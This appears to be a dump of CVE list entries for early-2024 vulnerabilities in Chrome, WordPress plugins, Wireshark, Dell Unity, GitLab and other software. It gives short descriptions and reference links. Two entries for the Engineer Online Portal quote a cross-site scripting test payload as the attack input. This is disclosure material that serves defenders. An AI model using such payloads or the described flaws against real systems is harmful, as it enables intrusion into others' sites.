CVE 2024 225 Candidate Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-210776b8c7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/ | FEDORA:FEDORA-2024-a6c2300bca | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/ | GENTOO:GLSA-202401-34 | URL:https://security.gentoo.org/glsa/202401-34 | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | MISC:https://crbug.com/1506923 | URL:https://crbug.com/1506923 Assigned (20240103)
CVE 2024 224 Candidate Use after free in WebAudio in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-210776b8c7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/ | FEDORA:FEDORA-2024-a6c2300bca | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/ | GENTOO:GLSA-202401-34 | URL:https://security.gentoo.org/glsa/202401-34 | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | MISC:https://crbug.com/1505086 | URL:https://crbug.com/1505086 Assigned (20240103)
CVE 2024 223 Candidate Heap buffer overflow in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-210776b8c7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/ | FEDORA:FEDORA-2024-a6c2300bca | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/ | GENTOO:GLSA-202401-34 | URL:https://security.gentoo.org/glsa/202401-34 | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | MISC:https://crbug.com/1505009 | URL:https://crbug.com/1505009 Assigned (20240103)
CVE 2024 222 Candidate Use after free in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-210776b8c7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/ | FEDORA:FEDORA-2024-a6c2300bca | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/ | GENTOO:GLSA-202401-34 | URL:https://security.gentoo.org/glsa/202401-34 | MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html | MISC:https://crbug.com/1501798 | URL:https://crbug.com/1501798 Assigned (20240103)
CVE 2024 221 Candidate The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors. MISC:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291 | URL:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291 | MISC:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441 | URL:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve Assigned (20240103)
CVE 2024 220 Candidate B&R Automation Studio Upgrade Service and B&R Technology Guarding use insufficient cryptography for communication to the upgrade and the licensing servers. A network-based attacker could exploit the vulnerability to execute arbitrary code on the products or sniff sensitive data. Missing Encryption of Sensitive Data, Cleartext Transmission of Sensitive Information, Improper Control of Generation of Code ('Code Injection'), Inadequate Encryption Strength vulnerability in B&R Industrial Automation B&R Automation Studio (Upgrade Service modules), B&R Industrial Automation Technology Guarding.This issue affects B&R Automation Studio: <4.6; Technology Guarding: <1.4.0. MISC:https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf | URL:https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf Assigned (20240103)
CVE 2024 219 Candidate In Telerik JustDecompile versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the applications installer component. In an environment where an existing Telerik JustDecompile install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system. MISC:https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability | URL:https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability | MISC:https://www.telerik.com/products/decompiler.aspx | URL:https://www.telerik.com/products/decompiler.aspx Assigned (20240103)
CVE 2024 217 Candidate A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost. MISC:RHBZ#2256624 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256624 | MISC:https://access.redhat.com/security/cve/CVE-2024-0217 | URL:https://access.redhat.com/security/cve/CVE-2024-0217 | MISC:https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79 | URL:https://github.com/PackageKit/PackageKit/commit/64278c9127e3333342b56ead99556161f7e86f79 Assigned (20240103)
CVE 2024 213 Candidate A buffer overflow vulnerability in TA for Linux and TA for MacOS prior to 5.8.1 allows a local user to gain elevated permissions, or cause a Denial of Service (DoS), through exploiting a memory corruption issue in the TA service, which runs as root. This may also result in the disabling of event reporting to ePO, caused by failure to validate input from the file correctly. MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10416 | URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10416 Assigned (20240103)
CVE 2024 212 Candidate The Cloudflare WordPress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API. MISC:https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3 | URL:https://github.com/cloudflare/Cloudflare-WordPress/releases/tag/v4.12.3 | MISC:https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2 | URL:https://github.com/cloudflare/Cloudflare-WordPress/security/advisories/GHSA-h2fj-7r3m-7gf2 Assigned (20240103)
CVE 2024 211 Candidate DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file MISC:GitLab Issue #19557 | URL:https://gitlab.com/wireshark/wireshark/-/issues/19557 | MISC:https://www.wireshark.org/security/wnpa-sec-2024-05.html | URL:https://www.wireshark.org/security/wnpa-sec-2024-05.html Assigned (20240103)
CVE 2024 210 Candidate Zigbee TLV dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file MISC:GitLab Issue #19504 | URL:https://gitlab.com/wireshark/wireshark/-/issues/19504 | MISC:https://www.wireshark.org/security/wnpa-sec-2024-04.html | URL:https://www.wireshark.org/security/wnpa-sec-2024-04.html Assigned (20240103)
CVE 2024 209 Candidate IEEE 1609.2 dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file MISC:GitLab Issue #19501 | URL:https://gitlab.com/wireshark/wireshark/-/issues/19501 | MISC:https://www.wireshark.org/security/wnpa-sec-2024-02.html | URL:https://www.wireshark.org/security/wnpa-sec-2024-02.html Assigned (20240103)
CVE 2024 208 Candidate GVCP dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file FEDORA:FEDORA-2024-b72131479b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34DBP5P2RHQ7XUABPANYYMOGV5KS6VEP/ | FEDORA:FEDORA-2024-fdc7dfb959 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MADSCHKZSCKQ5NLIX3UMOIJD2JZ65L4V/ | MISC:GitLab Issue #19496 | URL:https://gitlab.com/wireshark/wireshark/-/issues/19496 | MISC:https://www.wireshark.org/security/wnpa-sec-2024-01.html | URL:https://www.wireshark.org/security/wnpa-sec-2024-01.html | MLIST:[debian-lts-announce] 20240229 [SECURITY] [DLA 3746-1] wireshark security update | URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00016.html Assigned (20240103)
CVE 2024 207 Candidate HTTP3 dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file MISC:GitLab Issue #19502 | URL:https://gitlab.com/wireshark/wireshark/-/issues/19502 | MISC:https://www.wireshark.org/security/wnpa-sec-2024-03.html | URL:https://www.wireshark.org/security/wnpa-sec-2024-03.html Assigned (20240103)
CVE 2024 206 Candidate A symbolic link manipulation vulnerability in Trellix Anti-Malware Engine prior to the January 2024 release allows an authenticated local user to potentially gain an escalation of privileges. This was achieved by adding an entry to the registry under the Trellix ENS registry folder with a symbolic link to files that the user wouldn't normally have permission to. After a scan, the Engine would follow the links and remove the files MISC:https://kcm.trellix.com/corporate/index?page=content&id=SB10415 | URL:https://kcm.trellix.com/corporate/index?page=content&id=SB10415 Assigned (20240103)
CVE 2024 204 Candidate Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. MISC:http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html | MISC:http://packetstormsecurity.com/files/176974/Fortra-GoAnywhere-MFT-Unauthenticated-Remote-Code-Execution.html | MISC:https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml | URL:https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml | MISC:https://www.fortra.com/security/advisory/fi-2024-001 | URL:https://www.fortra.com/security/advisory/fi-2024-001 Assigned (20240103)
CVE 2024 203 Candidate The Digits plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.1. This is due to missing nonce validation in the 'digits_save_settings' function. This makes it possible for unauthenticated attackers to modify the default role of registered users to elevate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://digits.unitedover.com/changelog/ | URL:https://digits.unitedover.com/changelog/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/84f2afb4-f1c6-4313-8958-38f1b5140a67?source=cve Assigned (20240102)
CVE 2024 202 Candidate A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server's certificate. MISC:RHBZ#2256518 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256518 Assigned (20240102)
CVE 2024 201 Candidate The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_settings' function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings. MISC:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263 | URL:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.5/product-expiry-for-woocommerce.php#L263 | MISC:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263 | URL:https://plugins.trac.wordpress.org/browser/product-expiry-for-woocommerce/tags/2.6/product-expiry-for-woocommerce.php?rev=3014924#L263 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4006612-770a-482f-a8c2-e62f607914a9?source=cve Assigned (20240102)
CVE 2024 200 Candidate An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.8 Assigned (20240102)
CVE 2024 199 Candidate An authorization bypass vulnerability was discovered in GitLab affecting versions 11.3 prior to 16.7.7, 16.7.6 prior to 16.8.4, and 16.8.3 prior to 16.9.2. An attacker could bypass CODEOWNERS by utilizing a crafted payload in an old feature branch to perform malicious actions. MISC:GitLab Issue #436977 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/436977 | MISC:HackerOne Bug Bounty Report #2295423 | URL:https://hackerone.com/reports/2295423 | MISC:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/ | URL:https://about.gitlab.com/releases/2024/03/06/security-release-gitlab-16-9-2-released/ Assigned (20240102)
CVE 2024 197 Candidate A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access. MISC:https://supportportal.thalesgroup.com | URL:https://supportportal.thalesgroup.com Assigned (20240102)
CVE 2024 196 Candidate A vulnerability has been found in Magic-Api up to 2.0.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resource/file/api/save?auto=1. The manipulation leads to code injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249511. MISC:https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md | URL:https://github.com/laoquanshi/puppy/blob/main/Magic-Api%20Code%20Execution%20Vulnerability.md | MISC:https://vuldb.com/?ctiid.249511 | URL:https://vuldb.com/?ctiid.249511 | MISC:https://vuldb.com/?id.249511 | URL:https://vuldb.com/?id.249511 Assigned (20240102)
CVE 2024 195 Candidate A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. MISC:https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md | URL:https://github.com/laoquanshi/puppy/blob/main/spider-flow%20code%20injection%20causes%20rce.md | MISC:https://vuldb.com/?ctiid.249510 | URL:https://vuldb.com/?ctiid.249510 | MISC:https://vuldb.com/?id.249510 | URL:https://vuldb.com/?id.249510 Assigned (20240102)
CVE 2024 194 Candidate A vulnerability, which was classified as critical, has been found in CodeAstro Internet Banking System up to 1.0. This issue affects some unknown processing of the file pages_account.php of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249509 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing | URL:https://drive.google.com/file/d/147yg6oMHoJ1WvhH-TT0-GXDjKyNCSoeX/view?usp=sharing | MISC:https://vuldb.com/?ctiid.249509 | URL:https://vuldb.com/?ctiid.249509 | MISC:https://vuldb.com/?id.249509 | URL:https://vuldb.com/?id.249509 Assigned (20240102)
CVE 2024 193 Candidate A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system. MISC:RHBZ#2255653 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2255653 | MISC:RHSA-2024:1018 | URL:https://access.redhat.com/errata/RHSA-2024:1018 | MISC:RHSA-2024:1019 | URL:https://access.redhat.com/errata/RHSA-2024:1019 | MISC:RHSA-2024:1248 | URL:https://access.redhat.com/errata/RHSA-2024:1248 | MISC:https://access.redhat.com/security/cve/CVE-2024-0193 | URL:https://access.redhat.com/security/cve/CVE-2024-0193 Assigned (20240102)
CVE 2024 192 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file downloadable.php of the component Add Downloadable. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249505 was assigned to this vulnerability. MISC:https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM | URL:https://mega.nz/file/2RNnjDTR#nDT4E74juKhdO3eWTv8VjDD2dDcNUzyAk2UR3psM8rM | MISC:https://vuldb.com/?ctiid.249505 | URL:https://vuldb.com/?ctiid.249505 | MISC:https://vuldb.com/?id.249505 | URL:https://vuldb.com/?id.249505 Assigned (20240102)
CVE 2024 191 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/uploads/. The manipulation leads to file and directory information exposure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249504. MISC:https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY | URL:https://mega.nz/file/uZt00bIA#uqwP2WkWK5kbKOUbRrgbZY4_-4enuhFw5O9LtJ_cclY | MISC:https://vuldb.com/?ctiid.249504 | URL:https://vuldb.com/?ctiid.249504 | MISC:https://vuldb.com/?id.249504 | URL:https://vuldb.com/?id.249504 Assigned (20240102)
CVE 2024 190 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file add_quiz.php of the component Quiz Handler. The manipulation of the argument Quiz Title/Quiz Description with the input </title><scRipt>alert(x)</scRipt> leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249503. MISC:https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw | URL:https://mega.nz/file/HANhAKyT#lGcBglLDU3LDdfJsri3vYgnwn5amW8gvdOxbbYjAwJw | MISC:https://vuldb.com/?ctiid.249503 | URL:https://vuldb.com/?ctiid.249503 | MISC:https://vuldb.com/?id.249503 | URL:https://vuldb.com/?id.249503 Assigned (20240102)
CVE 2024 189 Candidate A vulnerability has been found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file teacher_message.php of the component Create Message Handler. The manipulation of the argument Content with the input </title><scRipt>alert(x)</scRipt> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249502 is the identifier assigned to this vulnerability. MISC:https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q | URL:https://mega.nz/file/WNNSmRbR#ANdE-2h3pyJ8rEktaD2XlSyuksUiCPWBMGMJlJnhb9Q | MISC:https://vuldb.com/?ctiid.249502 | URL:https://vuldb.com/?ctiid.249502 | MISC:https://vuldb.com/?id.249502 | URL:https://vuldb.com/?id.249502 Assigned (20240102)
CVE 2024 188 Candidate A vulnerability, which was classified as problematic, was found in RRJ Nueva Ecija Engineer Online Portal 1.0. This affects an unknown part of the file change_password_teacher.php. The manipulation leads to weak password requirements. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-249501 was assigned to this vulnerability. MISC:https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk | URL:https://mega.nz/file/2V9ARboA#-JIGiuLxxbri4T1mDEHl8OBeDrwLogoQlLiIji1AQZk | MISC:https://vuldb.com/?ctiid.249501 | URL:https://vuldb.com/?ctiid.249501 | MISC:https://vuldb.com/?id.249501 | URL:https://vuldb.com/?id.249501 Assigned (20240102)
CVE 2024 187 Candidate The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin MISC:https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/ | URL:https://wpscan.com/vulnerability/b4600411-bee1-4cc8-aee9-0a613ac9b55b/ Assigned (20240101)
CVE 2024 186 Candidate A vulnerability classified as problematic has been found in HuiRan Host Reseller System up to 2.0.0. Affected is an unknown function of the file /user/index/findpass?do=4 of the component HTTP POST Request Handler. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249444. MISC:https://note.zhaoj.in/share/WwPWWizD2Spk | URL:https://note.zhaoj.in/share/WwPWWizD2Spk | MISC:https://vuldb.com/?ctiid.249444 | URL:https://vuldb.com/?ctiid.249444 | MISC:https://vuldb.com/?id.249444 | URL:https://vuldb.com/?id.249444 Assigned (20240101)
CVE 2024 185 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file dasboard_teacher.php of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249443. MISC:https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE | URL:https://mega.nz/file/PBd13AoR#G3fYWB82wGCa7sD22JP3_twtbw3B0qSJ-4eMMrYR5cE | MISC:https://vuldb.com/?ctiid.249443 | URL:https://vuldb.com/?ctiid.249443 | MISC:https://vuldb.com/?id.249443 | URL:https://vuldb.com/?id.249443 Assigned (20240101)
CVE 2024 184 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability. MISC:https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k | URL:https://mega.nz/file/eN8yEKSA#YCJNH1v4BKOG2xyxOZYPIuO3Oz7biv2ugfarAI5n_3k | MISC:https://vuldb.com/?ctiid.249442 | URL:https://vuldb.com/?ctiid.249442 | MISC:https://vuldb.com/?id.249442 | URL:https://vuldb.com/?id.249442 Assigned (20240101)
CVE 2024 183 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability. MISC:https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E | URL:https://mega.nz/file/SB8ylCxQ#vSaXJwbNjeG-KXatgkxE8XI6Cmnv-A_Sg2IjvoJZs0E | MISC:https://vuldb.com/?ctiid.249441 | URL:https://vuldb.com/?ctiid.249441 | MISC:https://vuldb.com/?id.249441 | URL:https://vuldb.com/?id.249441 Assigned (20240101)
CVE 2024 182 Candidate A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-249440. MISC:VDB-249440 | CTI Indicators | URL:https://vuldb.com/?ctiid.249440 | MISC:VDB-249440 | SourceCodester Engineers Online Portal Admin Login sql injection | URL:https://vuldb.com/?id.249440 Assigned (20240101)
CVE 2024 181 Candidate A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin_user.php of the component Admin Panel. The manipulation of the argument Firstname/Lastname/Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249433 was assigned to this vulnerability. MISC:https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA | URL:https://mega.nz/file/3Yc2iRzY#Uv7ECzLwUvff__JXEcyPG9oxJ0A1fsBIFGVaS35pvtA | MISC:https://vuldb.com/?ctiid.249433 | URL:https://vuldb.com/?ctiid.249433 | MISC:https://vuldb.com/?id.249433 | URL:https://vuldb.com/?id.249433 Assigned (20240101)
CVE 2024 173 Candidate Dell PowerEdge Server BIOS and Dell Precision Rack BIOS contain an improper parameter initialization vulnerability. A local low privileged attacker could potentially exploit this vulnerability to read the contents of non-SMM stack memory. MISC:https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000222898/dsa-2024-034-security-update-for-dell-poweredge-server-bios-for-an-improper-parameter-initialization-vulnerability Assigned (20231214)
CVE 2024 170 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in its svc_cava utility. An authenticated attacker could potentially exploit this vulnerability, escaping the restricted shell and execute arbitrary operating system commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
CVE 2024 169 Candidate Dell Unity, versions prior to 5.4, contains a cross-site scripting (XSS) vulnerability. An authenticated attacker could potentially exploit this vulnerability, leading users to download and execute malicious software crafted by this product's feature to compromise their systems. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
CVE 2024 168 Candidate Dell Unity, versions prior to 5.4, contains a Command Injection Vulnerability in svc_oscheck utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to inject arbitrary operating system commands. This vulnerability allows an authenticated attacker to execute commands with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
CVE 2024 167 Candidate Dell Unity, versions prior to 5.4, contains an OS Command Injection Vulnerability in the svc_topstats utility. An authenticated attacker could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files on the file system with root privileges. MISC:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222010/dsa-2024-042-dell-unity-dell-unity-vsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities Assigned (20231214)
